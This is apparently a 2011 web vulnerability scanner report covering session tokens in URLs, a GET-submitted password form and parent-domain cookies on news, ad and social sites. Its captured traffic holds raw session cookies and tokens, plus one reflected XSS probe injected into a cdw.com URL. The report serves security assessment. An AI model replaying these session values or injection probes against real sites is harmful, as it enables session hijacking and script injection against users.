Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /secure-us.imrworldwide.com/cgi-bin/m HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.13. http://www.computerworld.com/spring/newsletter/1004/Computerworld%20Daily/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1004/Computerworld%20Daily/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1004/Computerworld%20Daily/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:44 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLSWRSYXL"
Cache-Control: public, max-age=219
Expires: Sun, 04 Sep 2011 14:10:08 GMT
Date: Sun, 04 Sep 2011 14:06:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

7.14. http://www.computerworld.com/spring/newsletter/1019/Networking/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1019/Networking/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1019/Networking/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:44 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLNWRSYXL"
Cache-Control: public, max-age=308
Expires: Sun, 04 Sep 2011 14:11:37 GMT
Date: Sun, 04 Sep 2011 14:06:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

7.15. http://www.computerworld.com/spring/newsletter/1021/Operating%20System/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1021/Operating%20System/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1021/Operating%20System/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:45 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLKWRSYXL"
Cache-Control: public, max-age=252
Expires: Sun, 04 Sep 2011 14:10:41 GMT
Date: Sun, 04 Sep 2011 14:06:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

7.16. http://www.computerworld.com/spring/newsletter/1025/Security/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1025/Security/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1025/Security/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:45 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLUVRSYXL"
Cache-Control: public, max-age=202
Expires: Sun, 04 Sep 2011 14:09:51 GMT
Date: Sun, 04 Sep 2011 14:06:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

7.17. http://www.computerworld.com/spring/newsletter/1028/The%20Weekly%20Top%2010/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.computerworld.com
Path:	/spring/newsletter/1028/The%20Weekly%20Top%2010/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /spring/newsletter/1028/The%20Weekly%20Top%2010/ HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Sun, 04 Sep 2011 14:10:45 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLKVRSYXL"
Cache-Control: public, max-age=238
Expires: Sun, 04 Sep 2011 14:10:29 GMT
Date: Sun, 04 Sep 2011 14:06:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<t
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

7.18. http://www.csoonline.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.csoonline.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=efb6d514cdcaa8a88ed8190a5011fe9532325aa8&callback=dbase_parse

Request

GET / HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.19. http://www.cwsubscribe.com/cgi-win/cw.cgi previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.cwsubscribe.com
Path:	/cgi-win/cw.cgi

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse

Request

GET /cgi-win/cw.cgi HTTP/1.1
Host: www.cwsubscribe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.20. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=123026274413041&app_id=123026274413041&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8084d7fc%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10fb1b934%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe592afdc%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc67f613%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aa5ce2f8%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=123026274413041&app_id=123026274413041&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8084d7fc%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10fb1b934%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe592afdc%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc67f613%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aa5ce2f8%26origin%3Dhttp%253A%252F%252Fblogs.computerworld.com%252Ff1e6e8758c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2deaa9e18&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.185.54
X-Cnection: close
Date: Sun, 04 Sep 2011 12:13:51 GMT
Content-Length: 257

<script type="text/javascript">
parent.postMessage("cb=fc67f613&origin=http\u00253A\u00252F\u00252Fblogs.computerworld.com\u00252Ff1e6e8758c&relation=parent&transport=postmessage&frame=f2deaa9e18", "h
...[SNIP]...

7.21. http://www.infoworld.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.infoworld.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=cee711554501392246965521cfb9ab9aa83ae949&callback=OPG.Demandbase.dbase_parse

Request

GET / HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.22. http://www.itworld.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.itworld.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=2bfb26e0f878776f913fb41e5aa2daecc7ba0637&callback=OPG.Demandbase.dbase_parse
http://api.demandbase.com/api/v1/ip.json?token=bacca8eba8bded95b5dd46f7a3d8ebc282966537&callback=dbase_parse

Request

GET / HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.23. http://www.javaworld.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.javaworld.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse

Request

GET / HTTP/1.1
Host: www.javaworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.24. http://www.networkworld.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.networkworld.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse

Request

GET / HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.25. http://www2.maas360.com/common/chat/FL_ChatManager.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www2.maas360.com
Path:	/common/chat/FL_ChatManager.js

Issue detail

The response contains the following links that appear to contain session tokens:

https://server.iad.liveperson.net/hc/25817976/?cmd=file&file=visitorWantsToChat&site=25817976&byhref=1&SESSIONVAR!skill=Technical%20Support&imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a/

Request

GET /common/chat/FL_ChatManager.js HTTP/1.1
Host: www2.maas360.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.maas360.com/services/mdm_trial.php
Cookie: PHPSESSID=902b8418a5af5c8d9a4a4d99e26f8f40

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:35:14 GMT
Server: Apache
Last-Modified: Thu, 26 May 2011 14:51:33 GMT
Accept-Ranges: bytes
Content-Length: 5634
Content-Type: application/javascript

// The page that includes this must also include 'LivePerson_MonitorCode.js' as late as possible (*after* the point where the links & images are in the body.)

// These are the functions used most of
...[SNIP]...
<div>
<a id="_lpChatBtn" href='https://server.iad.liveperson.net/hc/25817976/?cmd=file&file=visitorWantsToChat&site=25817976&byhref=1&SESSIONVAR!skill=Technical%20Support&imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a/' target='chat25817976'>
<span style="font:normal 11px Arial, Helvetica, sans-serif;color:#0000ff">
...[SNIP]...

8. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/submit

The form contains the following password field:

password

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9. Cookie scoped to parent domain previous next
There are 49 instances of this issue:

http://api.twitter.com/1/SCMagazineAU/lists/infosec/statuses.json
https://api.twitter.com/1/statuses/user_timeline.json
http://login.dotomi.com/ucm/UCMController
http://www.amazon.com/s/
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/z/i.cid
http://action.media6degrees.com/orbserv/hbpix
http://ads.pointroll.com/PortalServe/
https://adwords.google.com/um/StartNewLogin
http://amch.questionmarket.com/adsc/d921286/4/931683/adscout.php
http://amch.questionmarket.com/adscgen/dynamiclink.js.php
http://apis.google.com/js/plusone.js
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://b.voicefive.com/p
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://buy.norton.com/ps_ant_de_de_eset
http://clk.atdmt.com/MRT/go/341816816/direct
http://clk.atdmt.com/go/262448070/direct
http://go.techtarget.com/clicktrack-r/activity/activity.gif
http://ib.adnxs.com/seg
http://id.google.com/verify/EAAAAON_69mnEvmo-ER-Dz4hnl0.gif
http://idcs.interclick.com/Segment.aspx
http://idgenterprise.112.2o7.net/b/ss/computerworldcom/1/H.20.3/s25338357510045
http://kaplab.netmng.com/pixel/
http://leadback.advertising.com/adcedge/lb
http://leadback.advertising.com/adcedge/lb
http://m.adnxs.com/msftcookiehandler
http://media.fastclick.net/w/tre
http://picasaweb.google.com/lh/view
http://pixel.mathtag.com/event/img
http://pto.digitalriver.com/trial/646/p/kaspersky_us_storepage.962/15/content.js
http://r.openx.net/set
http://r.turn.com/r/beacon
http://reservoir.marketstudio.net/reservoir
http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
http://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/ti.0%2Cai.0/ti.gif
http://www.blogger.com/comment-iframe.g
http://www.cdw.com/TabStatus.aspx
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/home.php
http://www.youtube.com/results

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://api.twitter.com/1/SCMagazineAU/lists/infosec/statuses.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/SCMagazineAU/lists/infosec/statuses.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNWgZDQyAToHaWQiJWVjYmMxNjUyZWVlMzdl%250AMjgwNWQ5N2ZlOGU4OTQ0YzllIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--4354deccaa66f39c42b062effe22822969df1b79; domain=.twitter.com; path=/; HttpOnly
guest_id=v1%3A131513903352129097; domain=.twitter.com; path=/; expires=Wed, 04 Sep 2013 00:23:53 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/SCMagazineAU/lists/infosec/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=110324863469748224&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1315138601465=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr8np8%2BGlE7T15RjB5TG1dT7OQvpH3FV31jUVQgsqxhzdklVHNx5%2BughLaXOtg8pnsJ4V1Onws7YNj7pjeFPdi9Mj13bYzJzZnLNqzv5HztsFg%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOQtWzQyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTEw%250AZDg5NDY1ZDlmNWI3NDZlOTJkYTAwZmE5NWQxOTgy--aa8166d5bb7ce25931d3ab10eb5b6745e5f55990

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 12:23:53 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00402
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315141983
Set-Cookie: guest_id=v1%3A131513903352129097; domain=.twitter.com; path=/; expires=Wed, 04 Sep 2013 00:23:53 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNWgZDQyAToHaWQiJWVjYmMxNjUyZWVlMzdl%250AMjgwNWQ5N2ZlOGU4OTQ0YzllIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--4354deccaa66f39c42b062effe22822969df1b79; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 12:28:53 GMT
Vary: Accept-Encoding
Content-Length: 330
Connection: close

TWTR.Widget.receiveCallback_1({"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/SCMagazineAU\/lists\/infosec\/statuses.json?callback=TWTR.Widget.rec
...[SNIP]...

9.2. https://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlMzY4MTAzMzIwYTU0MDNmOWJkMThiMGViOWU3OTE3%250ANWE6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6D2NyZWF0%250AZWRfYXRsKwjJkXE0MgE6B2lkIiUyODllZjM2MmI5OWI5NTZkZDBiMjU4MTdh%250ANTAwY2M4NSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZs%250AYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a7841198548fdcba151b3dfbcb0ca8bd6f7910f3; domain=.twitter.com; path=/; HttpOnly
guest_id=v1%3A131514479476958541; domain=.twitter.com; path=/; expires=Wed, 04 Sep 2013 01:59:54 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.3. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DotomiSession_2399=2_273300890137713469$230600846273249123$2065492370$1315148282514; Domain=.dotomi.com; Path=/
DotomiUser=230600846273249123$0$2065492370; Domain=.dotomi.com; Expires=Tue, 03-Sep-2013 14:58:02 GMT; Path=/
DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHKDNEGQNECVltVlFLYHxnfAoMBQ9AVxZYERtFSlUCJiZWfWliVH5AeEoNYlsKA28BQgBweQRiUgRNUGBDBwEgEGR8AAEICEBeBAJWR0hCQ1tlY08oOycGGRA5AmtmXgQAdl0%3D; Domain=.dotomi.com; Expires=Tue, 03-Sep-2013 14:58:02 GMT; Path=/
DotomiRR2399=-1$3$0$; Domain=.dotomi.com; Expires=Mon, 05-Sep-2011 14:58:02 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_format=5&dtm_com=28&dtm_fid=101&cli_promo_id=1&dtm_cid=2399&dtm_cmagic=bc7f62&dtmc_loc=http%3A//www.cdw.com/shop/search/hubs/Products/Software/F.aspx%3F1d6ea%2522%253E%253Cscript%253Eprompt%28document.location%29%253C/script%253Ed7742b51610%3D1&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_pg_count=1&dtmc_cm_ckey=dtm_cid%3D2399%3Bdtm_cmagic%3D%5C%22bc7f62%5C%22%3B&dtmc_cm_tid=1&dtmc_cm_pi=CDW%20Hubs%3A%20Software&dtmc_cm_cg=HUBS_SOFTWARE HTTP/1.1
Host: login.dotomi.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx?1d6ea%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Ed7742b51610=1
Cookie: DotomiUser=230600846273249123$0$2065492370; DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHKDNEGQNECVltVlFLYHxnfAoMBQ9AVxZYERtFSlUCJiZWfWliVH5AeEoNYlsKA28BQgBweQRiUgRNUGBDBhgkLgkqQUhqC0BYAAtW; DotomiRR2304=-1$1$1$; rt_14000=2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:58:02 GMT
X-Name: dmc-s09
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
